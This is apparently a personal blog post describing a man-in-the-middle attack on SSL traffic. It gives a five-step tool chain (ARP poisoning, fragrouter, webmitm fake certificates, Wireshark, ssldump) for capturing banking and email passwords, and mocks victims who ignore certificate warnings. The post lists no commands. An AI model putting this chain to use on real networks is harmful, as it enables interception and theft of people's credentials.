Hey hey hey! I use online banking, but it's okay because I make sure to look for the 's' in https!
Virtually my entire life is recorded in Gmail, but it's okay because the authentication uses SSL!
SSL will save us all!
Except... not. It actually took me a few days, the first time, but now I could plug a computer into your network and read all your SSL traffic in matter of minutes. If I can get upstream of you, it's even easier.
When you go to your bank, your browser sees my SSL certificate, not the bank's. You accept it, and communicate with me. I take everything you say and relay it on to the bank, and say back to you whatever the bank said to me. You never know the difference, and I know your password and username.
It takes a handful of programs, but most of them are already compiled in the Backtrack 2 Live CD. The few days it took me were spent learning how to modify the Live CD and tracking down the software I needed to do the last few steps. Here's the quick rundown:
====================
1. ARP cache poisoning -- tricks your computer into using mine as its router, which I don't even need to do if I can get upstream of you (which is better for me, because a smart person could detect this little cache poisoning with a traceroute command)
2. Fragrouter -- sets my machine up to act as a router, relaying your information through me on to its intended destination
3. Webmitm -- creates a fake SSL certificate and presents it to your browser when you try to go to a real SSL-secured site (this is the other major weakness of this implementation -- I only can configure one cert, and you'll see it with a popup warning, so if you carefully read those warnings, you'll be alerted here) (but, realistically, who reads those warnings?)
4. Wireshark -- the new version of Ethereal, this grabs all the traffic that passes through my computer (which, of course, includes all your traffic now, which is still encrypted, but now it's encrypted with MY ssl certificate)
5. SSLdump -- decrypts all of your secure traffic with my ssl certificate, sucker.
====================
I'd like to improve this attack by writing a modification of webmitm that allows me to configure or have automatically generated multiple fake certificates and present them based on the destination URL. So when you go to Google, you'll see my fake Google cert. Go to your bank and see my fake bank cert. Odds of you ever realizing what's happening = fairly small. (Where you = average yokel, not the undoubtedly brilliant and web-savvy readers of my blog.)
So, next time you're having a friendly argument with some coworkers about how weak SSL is and whether it's purely theoretical or could actually, practically be broken, you don't have to do all this work -- just point them to my blog. Because I'm compulsively ridiculous about things like this.